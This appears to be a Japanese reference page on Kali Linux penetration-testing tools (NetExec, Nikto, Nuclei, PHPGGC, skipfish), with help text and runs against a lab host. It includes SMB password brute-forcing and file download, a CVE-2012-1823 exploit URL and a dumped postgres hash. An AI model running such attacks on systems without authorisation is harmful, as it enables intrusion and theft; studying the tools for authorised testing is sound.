INFO: 2024/10/25 07:12:46 == Checking for A record ==
INFO: 2024/10/25 07:12:46 IP address MX: ***.***.***.***
INFO: 2024/10/25 07:12:46 AS Number: 9371
INFO: 2024/10/25 07:12:46 AS Country: JP
INFO: 2024/10/25 07:12:46 == Checking for PTR record ==
INFO: 2024/10/25 07:12:46 PTR entry: *****.ne.jp.
INFO: 2024/10/25 07:12:46 PTR matches MX record
INFO: 2024/10/25 07:12:46 == Checking for SPF record ==
INFO: 2024/10/25 07:12:46 SPF set
INFO: 2024/10/25 07:12:46 *****.dev. 300 IN TXT "v=spf1 a:*****.ne.jp mx ~all"
INFO: 2024/10/25 07:12:46 == Checking for MTA-STS ==
INFO: 2024/10/25 07:12:46 MTA-STS not set
INFO: 2024/10/25 07:12:46 == Checking for open e-mail ports ==
INFO: 2024/10/25 07:12:46 Open ports: [25 465 587]
INFO: 2024/10/25 07:12:46 == Checking for open relay on port 25 ==
INFO: 2024/10/25 07:12:57 Server Banner: 220 *****.ne.jp ESMTP Sendmail 8.16.1/8.16.1; Fri, 25 Oct 2024 16:12:47 +0900 (JST)
INFO: 2024/10/25 07:12:57 Fake sender not accepted.
INFO: 2024/10/25 07:12:57 Recipient not accepted. Skipped further open relay tests.
INFO: 2024/10/25 07:12:57 Server is not an open relay
INFO: 2024/10/25 07:12:57 == Checking for STARTTLS on port 25 ==
INFO: 2024/10/25 07:12:57 STARTTLS supported
INFO: 2024/10/25 07:12:57 STARTTLS - TLS Version: TLS 1.2
INFO: 2024/10/25 07:12:57 Certificate is valid
INFO: 2024/10/25 07:12:57 == Checking for VRFY support ==
INFO: 2024/10/25 07:12:57 VRFY command not supported.
INFO: 2024/10/25 07:12:57 == Checking for TLS support on port 465 ==
INFO: 2024/10/25 07:12:57 SMTPS supported
INFO: 2024/10/25 07:12:57 SMTPS TLS certificate valid
INFO: 2024/10/25 07:12:57 SMTPS TLS Version: TLS 1.2
INFO: 2024/10/25 07:12:57 Test finished.
NetExec
FTP/SSH/SMB/RDP/VNC/LDAP/NFSなどのネットワークサービスに対応したエクスプロイトツールです。
■ 使用方法
root@kali:~# nxc --help
usage: nxc [-h] [--version] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--verbose] [--debug] [--no-progress] [--log LOG] [-6]
[--dns-server DNS_SERVER] [--dns-tcp] [--dns-timeout DNS_TIMEOUT]
{wmi,ldap,nfs,rdp,vnc,mssql,smb,ftp,ssh,winrm} ...
options:
-h, --help show this help message and exit
Generic:
Generic options for nxc across protocols
--version Display nxc version
-t THREADS, --threads THREADS
set how many concurrent threads to use
--timeout TIMEOUT max timeout in seconds of each thread
--jitter INTERVAL sets a random delay between each authentication
Output:
Options to set verbosity levels and control output
--verbose enable verbose output
--debug enable debug level information
--no-progress do not displaying progress bar during scan
--log LOG export result into a custom file
DNS:
-6 Enable force IPv6
--dns-server DNS_SERVER
Specify DNS server (default: Use hosts file & System DNS)
--dns-tcp Use TCP instead of UDP for DNS queries
--dns-timeout DNS_TIMEOUT
DNS query timeout in seconds
Available Protocols:
{wmi,ldap,nfs,rdp,vnc,mssql,smb,ftp,ssh,winrm}
wmi own stuff using WMI
ldap own stuff using LDAP
nfs own stuff using NFS
rdp own stuff using RDP
vnc own stuff using VNC
mssql own stuff using MSSQL
smb own stuff using SMB
ftp own stuff using FTP
ssh own stuff using SSH
winrm own stuff using WINRM
■ 使用例
# 単語リストを使用して認証情報を特定
root@kali:~# nxc smb 192.168.11.4 -u users.txt -p passwords.txt
SMB 192.168.11.4 445 AAB548E9463C [*] Unix (name:AAB548E9463C) (domain:AAB548E9463C) (signing:False) (SMBv1:True)
SMB 192.168.11.4 445 AAB548E9463C [-] AAB548E9463C\hoge:hoge STATUS_LOGON_FAILURE
[...]
SMB 192.168.11.4 445 AAB548E9463C [+] AAB548E9463C\hello:hello
# 特定した認証情報を使って共有フォルダの一覧を取得
root@kali:~# nxc smb 192.168.11.4 -u hello -p hello --shares
SMB 192.168.11.4 445 AAB548E9463C [*] Unix (name:AAB548E9463C) (domain:AAB548E9463C) (signing:False) (SMBv1:True)
SMB 192.168.11.4 445 AAB548E9463C [+] AAB548E9463C\hello:hello
SMB 192.168.11.4 445 AAB548E9463C [*] Enumerated shares
SMB 192.168.11.4 445 AAB548E9463C Share Permissions Remark
SMB 192.168.11.4 445 AAB548E9463C ----- ----------- ------
SMB 192.168.11.4 445 AAB548E9463C print$ READ Printer Drivers
SMB 192.168.11.4 445 AAB548E9463C tmp READ,WRITE oh noes!
SMB 192.168.11.4 445 AAB548E9463C opt READ
SMB 192.168.11.4 445 AAB548E9463C IPC$ IPC Service (aab548e9463c server (Samba 3.0.20-Debian))
SMB 192.168.11.4 445 AAB548E9463C ADMIN$ IPC Service (aab548e9463c server (Samba 3.0.20-Debian))
SMB 192.168.11.4 445 AAB548E9463C hello READ,WRITE Home Directories
# 共有フォルダ内のファイルをダウンロード
root@kali:~# nxc smb 192.168.11.4 -u hello -p hello -M spider_plus -o DOWNLOAD_FLAG=True EXCLUDE_FILTER=print$,tmp,opt,IPC$,ADMIN$ OUTPUT_FOLDER=/tmp/smb
SMB 192.168.11.4 445 AAB548E9463C [*] Unix (name:AAB548E9463C) (domain:AAB548E9463C) (signing:False) (SMBv1:True)
SMB 192.168.11.4 445 AAB548E9463C [+] AAB548E9463C\hello:hello
SPIDER_PLUS 192.168.11.4 445 AAB548E9463C [*] Started module spidering_plus with the following options:
SPIDER_PLUS 192.168.11.4 445 AAB548E9463C [*] DOWNLOAD_FLAG: True
SPIDER_PLUS 192.168.11.4 445 AAB548E9463C [*] STATS_FLAG: True
SPIDER_PLUS 192.168.11.4 445 AAB548E9463C [*] EXCLUDE_FILTER: ['print$', 'tmp', 'opt', 'ipc$', 'admin$']
SPIDER_PLUS 192.168.11.4 445 AAB548E9463C [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 192.168.11.4 445 AAB548E9463C [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 192.168.11.4 445 AAB548E9463C [*] OUTPUT_FOLDER: /tmp/smb
SMB 192.168.11.4 445 AAB548E9463C [*] Enumerated shares
[...]
SPIDER_PLUS 192.168.11.4 445 AAB548E9463C [*] Downloads successful: 4
SPIDER_PLUS 192.168.11.4 445 AAB548E9463C [+] All files processed successfully.
root@kali:~# ls /tmp/smb/192.168.11.4/hello/
hello.txt
Nikto
Webアプリケーションに対してセキュリティスキャンを行います。
■ 使用方法
root@kali:~# nikto --help
Options:
-ask+ Whether to ask about submitting updates
yes Ask about each (default)
no Don\'t ask, don\'t send
auto Don\'t ask, just send
-check6 Check if IPv6 is working (connects to ipv6.google.com or value set in nikto.conf)
-Cgidirs+ Scan these CGI dirs: "none", "all", or values like "/cgi/ /cgi-a/"
-config+ Use this config file
-Display+ Turn on/off display outputs:
1 Show redirects
2 Show cookies received
3 Show all 200/OK responses
4 Show URLs which require authentication
D Debug output
E Display all HTTP errors
P Print progress to STDOUT
S Scrub output of IPs and hostnames
V Verbose output
-dbcheck Check database and other key files for syntax errors
-evasion+ Encoding technique:
1 Random URI encoding (non-UTF8)
2 Directory self-reference (/./)
3 Premature URL ending
4 Prepend long random string
5 Fake parameter
6 TAB as request spacer
7 Change the case of the URL
8 Use Windows directory separator (\)
A Use a carriage return (0x0d) as a request spacer
B Use binary value 0x0b as a request spacer
-followredirects Follow 3xx redirects to new location
-Format+ Save file (-o) format:
csv Comma-separated-value
json JSON Format
htm HTML Format
nbe Nessus NBE format
sql Generic SQL (see docs for schema)
txt Plain text
xml XML Format
(if not specified the format will be taken from the file extension passed to -output)
-Help This help information
-host+ Target host/URL
-id+ Host authentication to use, format is id:pass or id:pass:realm
-ipv4 IPv4 Only
-ipv6 IPv6 Only
-key+ Client certificate key file
-list-plugins List all available plugins, perform no testing
-maxtime+ Maximum testing time per host (e.g., 1h, 60m, 3600s)
-mutate+ Guess additional file names:
-mutate-options Provide information for mutates
-nointeractive Disables interactive features
-nolookup Disables DNS lookups
-nossl Disables the use of SSL
-noslash Strip trailing slash from URL (e.g., '/admin/' to '/admin')
-no404 Disables nikto attempting to guess a 404 page
-Option Over-ride an option in nikto.conf, can be issued multiple times
-output+ Write output to this file ('.' for auto-name)
-Pause+ Pause between tests (seconds)
-Plugins+ List of plugins to run (default: ALL)
-port+ Port to use (default 80)
-RSAcert+ Client certificate file
-root+ Prepend root value to all requests, format is /directory
-Save Save positive responses to this directory ('.' for auto-name)
-ssl Force ssl mode on port
-Tuning+ Scan tuning:
1 Interesting File / Seen in logs
2 Misconfiguration / Default File
3 Information Disclosure
4 Injection (XSS/Script/HTML)
5 Remote File Retrieval - Inside Web Root
6 Denial of Service
7 Remote File Retrieval - Server Wide
8 Command Execution / Remote Shell
9 SQL Injection
0 File Upload
a Authentication Bypass
b Software Identification
c Remote Source Inclusion
d WebService
e Administrative Console
x Reverse Tuning Options (i.e., include all except specified)
-timeout+ Timeout for requests (default 10 seconds)
-Userdbs Load only user databases, not the standard databases
all Disable standard dbs and load only user dbs
tests Disable only db_tests and load udb_tests
-useragent Over-rides the default useragent
-until Run until the specified time or duration
-url+ Target host/URL (alias of -host)
-usecookies Use cookies from responses in future requests
-useproxy Use the proxy defined in nikto.conf, or argument http://server:port
-Version Print plugin and database versions
-vhost+ Virtual host (for Host header)
-404code Ignore these HTTP codes as negative responses (always). Format is "302,301".
-404string Ignore this string in response body content as negative response (always). Can be a regular expression.
+ requires a value
■ 使用例
root@kali:~# nikto -host http://192.168.11.4/
- Nikto v2.5.0
---------------------------------------------------------------------------
---------------------------------------------------------------------------
+ 0 host(s) tested
┌──(root㉿kali_1)-[~]
└─# nikto -host http://192.168.11.4/
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.11.4
+ Target Hostname: 192.168.11.4
+ Target Port: 80
+ Start Time: 2024-10-30 04:02:12 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) DAV/2
+ /: Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /robots.txt: Server may leak inodes via ETags, header found with file /robots.txt, inode: 406870, size: 26, mtime: Tue Mar 16 05:56:22 2010. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE .
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /phpinfo.php: Output from the phpinfo() function was found.
+ /config/: Directory indexing found.
+ /config/: Configuration information may be available remotely.
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /login/: This might be interesting.
+ /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ /docs/: Directory indexing found.
+ /CHANGELOG.txt: A changelog was found.
+ /login.php: Admin login page/section found.
+ /?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823
+ /login.php?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823
+ /CHANGELOG.txt: Version number implies that there is a SQL Injection in Drupal 7, which can be used for authentication bypass (Drupalgeddon). See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704 https://www.sektioneins.de/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
+ 8102 requests: 0 error(s) and 27 item(s) reported on remote host
+ End Time: 2024-10-30 04:02:24 (GMT0) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Nuclei
Webアプリケーションに対してセキュリティスキャンを行います。
■ 使用方法
root@kali:~# nuclei --help
Usage:
nuclei [flags]
Flags:
TARGET:
-u, -target string[] target URLs/hosts to scan
-l, -list string path to file containing a list of target URLs/hosts to scan (one per line)
-eh, -exclude-hosts string[] hosts to exclude to scan from the input list (ip, cidr, hostname)
-resume string resume scan using resume.cfg (clustering will be disabled)
-sa, -scan-all-ips scan all the IP\'s associated with dns record
-iv, -ip-version string[] IP version to scan of hostname (4,6) - (default 4)
TARGET-FORMAT:
-im, -input-mode string mode of input file (list, burp, jsonl, yaml, openapi, swagger) (default "list")
-ro, -required-only use only required fields in input format when generating requests
-sfv, -skip-format-validation skip format validation (like missing vars) when parsing input file
TEMPLATES:
-nt, -new-templates run only new templates added in latest nuclei-templates release
-ntv, -new-templates-version string[] run new templates added in specific version
-as, -automatic-scan automatic web scan using wappalyzer technology detection to tags mapping
-t, -templates string[] list of template or template directory to run (comma-separated, file)
-turl, -template-url string[] template url or list containing template urls to run (comma-separated, file)
-w, -workflows string[] list of workflow or workflow directory to run (comma-separated, file)
-wurl, -workflow-url string[] workflow url or list containing workflow urls to run (comma-separated, file)
-validate validate the passed templates to nuclei
-nss, -no-strict-syntax disable strict syntax check on templates
-td, -template-display displays the templates content
-tl list all available templates
-tgl list all available tags
-sign signs the templates with the private key defined in NUCLEI_SIGNATURE_PRIVATE_KEY env variable
-code enable loading code protocol-based templates
-dut, -disable-unsigned-templates disable running unsigned templates or templates with mismatched signature
FILTERING:
-a, -author string[] templates to run based on authors (comma-separated, file)
-tags string[] templates to run based on tags (comma-separated, file)
-etags, -exclude-tags string[] templates to exclude based on tags (comma-separated, file)
-itags, -include-tags string[] tags to be executed even if they are excluded either by default or configuration
-id, -template-id string[] templates to run based on template ids (comma-separated, file, allow-wildcard)
-eid, -exclude-id string[] templates to exclude based on template ids (comma-separated, file)
-it, -include-templates string[] path to template file or directory to be executed even if they are excluded either by default or configuration
-et, -exclude-templates string[] path to template file or directory to exclude (comma-separated, file)
-em, -exclude-matchers string[] template matchers to exclude in result
-s, -severity value[] templates to run based on severity. Possible values: info, low, medium, high, critical, unknown
-es, -exclude-severity value[] templates to exclude based on severity. Possible values: info, low, medium, high, critical, unknown
-pt, -type value[] templates to run based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript
-ept, -exclude-type value[] templates to exclude based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript
-tc, -template-condition string[] templates to run based on expression condition
OUTPUT:
-o, -output string output file to write found issues/vulnerabilities
-sresp, -store-resp store all request/response passed through nuclei to output directory
-srd, -store-resp-dir string store all request/response passed through nuclei to custom directory (default "output")
-silent display findings only
-nc, -no-color disable output content coloring (ANSI escape codes)
-j, -jsonl write output in JSONL(ines) format
-irr, -include-rr -omit-raw include request/response pairs in the JSON, JSONL, and Markdown outputs (for findings only) [DEPRECATED use -omit-raw] (default true)
-or, -omit-raw omit request/response pairs in the JSON, JSONL, and Markdown outputs (for findings only)
-ot, -omit-template omit encoded template in the JSON, JSONL output
-nm, -no-meta disable printing result metadata in cli output
-ts, -timestamp enables printing timestamp in cli output
-rdb, -report-db string nuclei reporting database (always use this to persist report data)
-ms, -matcher-status display match failure status
-me, -markdown-export string directory to export results in markdown format
-se, -sarif-export string file to export results in SARIF format
-je, -json-export string file to export results in JSON format
-jle, -jsonl-export string file to export results in JSONL(ine) format
-rd, -redact string[] redact given list of keys from query parameter, request header and body
CONFIGURATIONS:
-config string path to the nuclei configuration file
-tp, -profile string template profile config file to run
-tpl, -profile-list list community template profiles
-fr, -follow-redirects enable following redirects for http templates
-fhr, -follow-host-redirects follow redirects on the same host
-mr, -max-redirects int max number of redirects to follow for http templates (default 10)
-dr, -disable-redirects disable redirects for http templates
-rc, -report-config string nuclei reporting module configuration file
-H, -header string[] custom header/cookie to include in all http request in header:value format (cli, file)
-V, -var value custom vars in key=value format
-r, -resolvers string file containing resolver list for nuclei
-sr, -system-resolvers use system DNS resolving as error fallback
-dc, -disable-clustering disable clustering of requests
-passive enable passive HTTP response processing mode
-fh2, -force-http2 force http2 connection on requests
-ev, -env-vars enable environment variables to be used in template
-cc, -client-cert string client certificate file (PEM-encoded) used for authenticating against scanned hosts
-ck, -client-key string client key file (PEM-encoded) used for authenticating against scanned hosts
-ca, -client-ca string client certificate authority file (PEM-encoded) used for authenticating against scanned hosts
-sml, -show-match-line show match lines for file templates, works with extractors only
-ztls use ztls library with autofallback to standard one for tls13 [Deprecated] autofallback to ztls is enabled by default
-sni string tls sni hostname to use (default: input domain name)
-dka, -dialer-keep-alive value keep-alive duration for network requests.
-lfa, -allow-local-file-access allows file (payload) access anywhere on the system
-lna, -restrict-local-network-access blocks connections to the local / private network
-i, -interface string network interface to use for network scan
-at, -attack-type string type of payload combinations to perform (batteringram,pitchfork,clusterbomb)
-sip, -source-ip string source ip address to use for network scan
-rsr, -response-size-read int max response size to read in bytes
-rss, -response-size-save int max response size to read in bytes (default 1048576)
-reset reset removes all nuclei configuration and data files (including nuclei-templates)
-tlsi, -tls-impersonate enable experimental client hello (ja3) tls randomization
-hae, -http-api-endpoint string experimental http api endpoint
INTERACTSH:
-iserver, -interactsh-server string interactsh server url for self-hosted instance (default: oast.pro,oast.live,oast.site,oast.online,oast.fun,oast.me)
-itoken, -interactsh-token string authentication token for self-hosted interactsh server
-interactions-cache-size int number of requests to keep in the interactions cache (default 5000)
-interactions-eviction int number of seconds to wait before evicting requests from cache (default 60)
-interactions-poll-duration int number of seconds to wait before each interaction poll request (default 5)
-interactions-cooldown-period int extra time for interaction polling before exiting (default 5)
-ni, -no-interactsh disable interactsh server for OAST testing, exclude OAST based templates
FUZZING:
-ft, -fuzzing-type string overrides fuzzing type set in template (replace, prefix, postfix, infix)
-fm, -fuzzing-mode string overrides fuzzing mode set in template (multiple, single)
-fuzz enable loading fuzzing templates (Deprecated: use -dast instead)
-dast enable / run dast (fuzz) nuclei templates
-dfp, -display-fuzz-points display fuzz points in the output for debugging
-fuzz-param-frequency int frequency of uninteresting parameters for fuzzing before skipping (default 10)
-fa, -fuzz-aggression string fuzzing aggression level controls payload count for fuzz (low, medium, high) (default "low")
UNCOVER:
-uc, -uncover enable uncover engine
-uq, -uncover-query string[] uncover search query
-ue, -uncover-engine string[] uncover search engine (shodan,censys,fofa,shodan-idb,quake,hunter,zoomeye,netlas,criminalip,publicwww,hunterhow,google) (default shodan)
-uf, -uncover-field string uncover fields to return (ip,port,host) (default "ip:port")
-ul, -uncover-limit int uncover results to return (default 100)
-ur, -uncover-ratelimit int override ratelimit of engines with unknown ratelimit (default 60 req/min) (default 60)
RATE-LIMIT:
-rl, -rate-limit int maximum number of requests to send per second (default 150)
-rld, -rate-limit-duration value maximum number of requests to send per second (default 1s)
-rlm, -rate-limit-minute int maximum number of requests to send per minute (DEPRECATED)
-bs, -bulk-size int maximum number of hosts to be analyzed in parallel per template (default 25)
-c, -concurrency int maximum number of templates to be executed in parallel (default 25)
-hbs, -headless-bulk-size int maximum number of headless hosts to be analyzed in parallel per template (default 10)
-headc, -headless-concurrency int maximum number of headless templates to be executed in parallel (default 10)
-jsc, -js-concurrency int maximum number of javascript runtimes to be executed in parallel (default 120)
-pc, -payload-concurrency int max payload concurrency for each template (default 25)
-prc, -probe-concurrency int http probe concurrency with httpx (default 50)
OPTIMIZATIONS:
-timeout int time to wait in seconds before timeout (default 10)
-retries int number of times to retry a failed request (default 1)
-ldp, -leave-default-ports leave default HTTP/HTTPS ports (eg. host:80,host:443)
-mhe, -max-host-error int max errors for a host before skipping from scan (default 30)
-te, -track-error string[] adds given error to max-host-error watchlist (standard, file)
-nmhe, -no-mhe disable skipping host from scan based on errors
-project use a project folder to avoid sending same request multiple times
-project-path string set a specific project path (default "/tmp")
-spm, -stop-at-first-match stop processing HTTP requests after the first match (may break template/workflow logic)
-stream stream mode - start elaborating without sorting the input
-ss, -scan-strategy value strategy to use while scanning(auto/host-spray/template-spray) (default auto)
-irt, -input-read-timeout value timeout on input read (default 3m0s)
-nh, -no-httpx disable httpx probing for non-url input
-no-stdin disable stdin processing
HEADLESS:
-headless enable templates that require headless browser support (root user on Linux will disable sandbox)
-page-timeout int seconds to wait for each page in headless mode (default 20)
-sb, -show-browser show the browser on the screen when running templates with headless mode
-ho, -headless-options string[] start headless chrome with additional options
-sc, -system-chrome use local installed Chrome browser instead of nuclei installed
-lha, -list-headless-action list available headless actions
DEBUG:
-debug show all requests and responses
-dreq, -debug-req show all sent requests
-dresp, -debug-resp show all received responses
-p, -proxy string[] list of http/socks5 proxy to use (comma separated or file input)
-pi, -proxy-internal proxy all internal requests
-ldf, -list-dsl-function list all supported DSL function signatures
-tlog, -trace-log string file to write sent requests trace log
-elog, -error-log string file to write sent requests error log
-version show nuclei version
-hm, -hang-monitor enable nuclei hang monitoring
-v, -verbose show verbose output
-profile-mem string generate memory (heap) profile & trace files
-vv display templates loaded for scan
-svd, -show-var-dump show variables dump for debugging
-vdl, -var-dump-limit int limit the number of characters displayed in var dump (default 255)
-ep, -enable-pprof enable pprof debugging server
-tv, -templates-version shows the version of the installed nuclei-templates
-hc, -health-check run diagnostic check up
UPDATE:
-ut, -update-templates update nuclei-templates to latest released version
-ud, -update-template-dir string custom directory to install / update nuclei-templates
-duc, -disable-update-check disable automatic nuclei/templates update check
STATISTICS:
-stats display statistics about the running scan
-sj, -stats-json display statistics in JSONL(ines) format
-si, -stats-interval int number of seconds to wait between showing a statistics update (default 5)
-mp, -metrics-port int port to expose nuclei metrics on (default 9092)
CLOUD:
-auth configure projectdiscovery cloud (pdcp) api key (default true)
-tid, -team-id string upload scan results to given team id (optional) (default "none")
-cup, -cloud-upload upload scan results to pdcp dashboard [DEPRECATED use -dashboard]
-sid, -scan-id string upload scan results to existing scan id (optional)
-sname, -scan-name string scan name to set (optional)
-pd, -dashboard upload / view nuclei results in projectdiscovery cloud (pdcp) UI dashboard
-pdu, -dashboard-upload string upload / view nuclei results file (jsonl) in projectdiscovery cloud (pdcp) UI dashboard
AUTHENTICATION:
-sf, -secret-file string[] path to config file containing secrets for nuclei authenticated scan
-ps, -prefetch-secrets prefetch secrets from the secrets file
■ 使用例
root@kali:~# nuclei -target 192.168.11.4 -exclude-severity info -silent
[CVE-2012-1823] [http] [high] http://192.168.11.4/index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
[phpinfo-files] [http] [low] http://192.168.11.4/phpinfo.php [paths="/phpinfo.php"]
[pgsql-default-db] [javascript] [high] 192.168.11.4:5432 [database="template1",password="postgres",usernames="postgres"]
[ssh-diffie-hellman-logjam] [javascript] [low] 192.168.11.4:22
[ssh-cbc-mode-ciphers] [javascript] [low] 192.168.11.4:22
[ssh-weak-algo-supported] [javascript] [medium] 192.168.11.4:22
[ssh-weak-mac-algo] [javascript] [low] 192.168.11.4:22
[ssh-weakkey-exchange-algo] [javascript] [low] 192.168.11.4:22
[CVE-2004-2687] [tcp] [high] 192.168.11.4:3632
[CVE-2020-1938] [tcp] [critical] 192.168.11.4:8009
[CVE-2011-2523] [tcp] [critical] 192.168.11.4:6200
[pgsql-version-detect] [javascript] [high] 192.168.11.4:5432 ["PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)"] [database="postgres",password="postgres",usernames="postgres"]
[pgsql-list-password-hashes] [javascript] [high] 192.168.11.4:5432 ["postgres : md53175bce1d3201d16594cebf9d7eb3f9d"] [database="postgres",password="postgres",usernames="postgres"]
[pgsql-default-db] [javascript] [high] 192.168.11.4:5432 [database="postgres",password="postgres",usernames="postgres"]
[postgres-default-logins] [javascript] [high] 192.168.11.4:5432 [passwords="postgres",usernames="postgres"]
[pgsql-file-read] [javascript] [high] 192.168.11.4:5432 ["postmaster.opts","PG_VERSION","pg_xlog","pg_multixact","global","postmaster.pid","base","pg_tblspc","server.crt","pg_clog","pg_twophase","pg_subtrans","root.crt","server.key"] [database="postgres",password="postgres",usernames="postgres"]
[pgsql-list-users] [javascript] [high] 192.168.11.4:5432 ["postgres"] [database="postgres",password="postgres",usernames="postgres"]
[pgsql-list-database] [javascript] [high] 192.168.11.4:5432 ["template1","template0","postgres"] [database="postgres",password="postgres",usernames="postgres"]
[ftp-anonymous-login] [tcp] [medium] 192.168.11.4:21
PHPGGC
安全でないオブジェクトのデシリアライズを悪用するペイロードを生成します。
■ 使用方法
root@kali:~# phpggc --help
USAGE
./phpggc [-h|-l|-i|...] <GadgetChain> [arguments]
INFORMATION
-h, --help Displays help
-l, --list [filter] Lists available gadget chains
-i, --information
Displays information about a gadget chain
OUTPUT
-o, --output <file>
Outputs the payload to a file instead of standard output
PHAR
-p, --phar <tar|zip|phar>
Creates a PHAR file of the given format
-pj, --phar-jpeg <file>
Creates a polyglot JPEG/PHAR file from given image
-pp, --phar-prefix <file>
Sets the PHAR prefix as the contents of the given file.
Generally used with -p phar to control the beginning of the generated file.
-pf, --phar-filename <filename>
Defines the name of the file contained in the generated PHAR (default: test.txt)
ENHANCEMENTS
-f, --fast-destruct
Applies the fast-destruct technique, so that the object is destroyed
right after the unserialize() call, as opposed to at the end of the
script
-a, --ascii-strings
Uses the 'S' serialization format instead of the standard 's' for non-printable chars.
This replaces every non-ASCII value to an hexadecimal representation:
s:5:"A<null_byte>B<cr><lf>"; -> S:5:"A\00B\09\0D";
This is experimental and it might not work in some cases.
-A, --armor-strings
Uses the 'S' serialization format instead of the standard 's' for every char.
This replaces every character to an hexadecimal representation:
s:5:"A<null_byte>B<cr><lf>"; -> S:5:"\41\00\42\09\0D";
This is experimental and it might not work in some cases.
Note: Since strings grow by a factor of 3 using this option, the payload can get
really long.
-n, --plus-numbers <types>
Adds a + symbol in front of every number symbol of the given type.
For instance, -n iO adds a + in front of every int and object name size:
O:3:"Abc":1:{s:1:"x";i:3;} -> O:+3:"Abc":1:{s:1:"x";i:+3;}
Note: Since PHP 7.2, only i and d (float) types can have a +
-w, --wrapper <wrapper>
Specifies a file containing at least one wrapper functions:
- process_parameters(array $parameters): called right before object is created
- process_object(object $object): called right before the payload is serialized
- process_serialized(string $serialized): called right after the payload is serialized
ENCODING
-s, --soft Soft URLencode
-u, --url URLencodes the payload
-b, --base64 Converts the output into base64
-j, --json Converts the output into json
Encoders can be chained, for instance -b -u -u base64s the payload,
then URLencodes it twice
CREATION
-N, --new <framework> <type>
Creates the file structure for a new gadgetchain for given framework
Example: ./phpggc -N Drupal RCE
--test-payload
Instead of displaying or storing the payload, includes vendor/autoload.php and unserializes the payload.
The test script can only deserialize __destruct, __wakeup, __toString and PHAR payloads.
Warning: This will run the payload on YOUR system !
■ 使用例
PHPGGCの使用例は過去の投稿をご参照ください。
skipfish
Webアプリケーションをスキャンしてセキュリティチェックを行います。
■ 使用方法
root@kali:~# skipfish --help
Usage: skipfish [ options ... ] -W wordlist -o output_dir start_url [ start_url2 ... ]
Authentication and access options:
-A user:pass - use specified HTTP authentication credentials
-F host=IP - pretend that 'host' resolves to 'IP'
-C name=val - append a custom cookie to all requests
-H name=val - append a custom HTTP header to all requests
-b (i|f|p) - use headers consistent with MSIE / Firefox / iPhone
-N - do not accept any new cookies
--auth-form url - form authentication URL
--auth-user user - form authentication user
--auth-pass pass - form authentication password
--auth-verify-url - URL for in-session detection
Crawl scope options:
-d max_depth - maximum crawl tree depth (16)
-c max_child - maximum children to index per node (512)
-x max_desc - maximum descendants to index per branch (8192)
-r r_limit - max total number of requests to send (100000000)
-p crawl% - node and link crawl probability (100%)
-q hex - repeat probabilistic scan with given seed
-I string - only follow URLs matching 'string'
-X string - exclude URLs matching 'string'
-K string - do not fuzz parameters named 'string'
-D domain - crawl cross-site links to another domain
-B domain - trust, but do not crawl, another domain
-Z - do not descend into 5xx locations
-O - do not submit any forms
-P - do not parse HTML, etc, to find new links
Reporting options:
-o dir - write output to specified directory (required)
-M - log warnings about mixed content / non-SSL passwords
-E - log all HTTP/1.0 / HTTP/1.1 caching intent mismatches
-U - log all external URLs and e-mails seen
-Q - completely suppress duplicate nodes in reports
-u - be quiet, disable realtime progress stats
-v - enable runtime logging (to stderr)
Dictionary management options:
-W wordlist - use a specified read-write wordlist (required)
-S wordlist - load a supplemental read-only wordlist
-L - do not auto-learn new keywords for the site
-Y - do not fuzz extensions in directory brute-force
-R age - purge words hit more than 'age' scans ago
-T name=val - add new form auto-fill rule
-G max_guess - maximum number of keyword guesses to keep (256)
-z sigfile - load signatures from this file
Performance settings:
-g max_conn - max simultaneous TCP connections, global (40)
-m host_conn - max simultaneous connections, per target IP (10)
